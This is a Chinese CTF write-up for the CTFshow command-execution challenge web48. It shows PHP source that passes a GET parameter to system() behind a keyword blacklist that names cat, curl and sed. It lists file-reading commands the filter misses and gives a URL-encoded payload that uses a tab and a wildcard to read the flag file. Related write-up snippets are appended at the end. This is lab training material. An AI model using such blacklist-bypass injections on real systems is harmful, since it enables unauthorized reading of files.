CTFshow 命令执行 web48
目录
- 源码
- 知识点
- 题解
- 总结
源码
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}
知识点
发现nl依然没有被过滤
more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep:在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings
题解
?c=nl%09fla?.php%0a
总结
水题
CTFshow 命令执行 web48相关推荐
- CTFshow——命令执行
CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...
- CTFshow命令执行29-123
命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...
- CTFshow 命令执行 web72
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
- [CTFSHOW]命令执行
文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...
- ctfshow命令执行篇
web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...
- ctfshow 命令执行 web29-web77 web118-122 web124 wp
南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...
- [CTFSHOW]命令执行55-74
web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...
- ctfshow命令执行(持续更新,已更至web39)
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...
- ctfshow命令执行
目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...
最新文章
- python流程控制-python之流程控制
- ELK Stack 日志分析 Elasticsearch搜索权限
- 服务器重启后,启动SAP ERP的步骤
- 怎么向后删除?(删除光标后的字符)(按delete键)
- 关于网络投票的反思2018-11-11
- LeetCode MySQL 1355. 活动参与者(any函数)
- 易语言mysql锁表_MySQL的3种锁定机制
- math 计算float_Java Math类静态float min(float f1,float f2)与示例
- 2020-2021家居行业年度盘点与趋势洞察
- 【转载】Linux等类Unix系统学习用书那点事儿!
- java 单链表是否有环_数据结构与算法随笔之链表-链表是否有环(二)
- 如何到top5%?NLP文本分类和情感分析竞赛总结
- 10+年程序员告诉你职场误区,如何快速提升自己?
- WCF 第五章 行为
- 怎么用计算机划因果图,计算机软考考试必备知识点:鱼骨图法
- Excel怎么忽略位置对比两列数据是否相同
- web网页设计期末课程大作业:基于HTML+CSS+JavaScript个人书画作品展示HTML模板(6页)
- excel表格打印每页都有表头_如何在Excel打印时每页都有表头?你知道么
- excel两个指标相关性分析_用Excel做相关性分析
- 微云虚拟化VOS操作系统
热门文章
- .NET中DLL“没有可放置在工具箱的组件”—FreeTextBox
- CROC-MBTU 2012, Elimination Round (ACM-ICPC) 总结
- Replation requires the actual server name ... Replication.Utilies
- 移动服务机器人模块选型
- AndroidStudio直接通过gradle无mk编译生成so
- android camera(二):摄像头工作原理、s5PV310 摄像头接口(CAMIF)
- php smtp tls,php – RoundcubePostfix SMTP:SSL例程:SSL3_READ_BYTES:tlsv1 alert unknown ca:s3_pkt.c...
- docker中操作系统与应用
- 交叉编译Open***-2.4.3
- PLSQL Developer连接Oracle数据库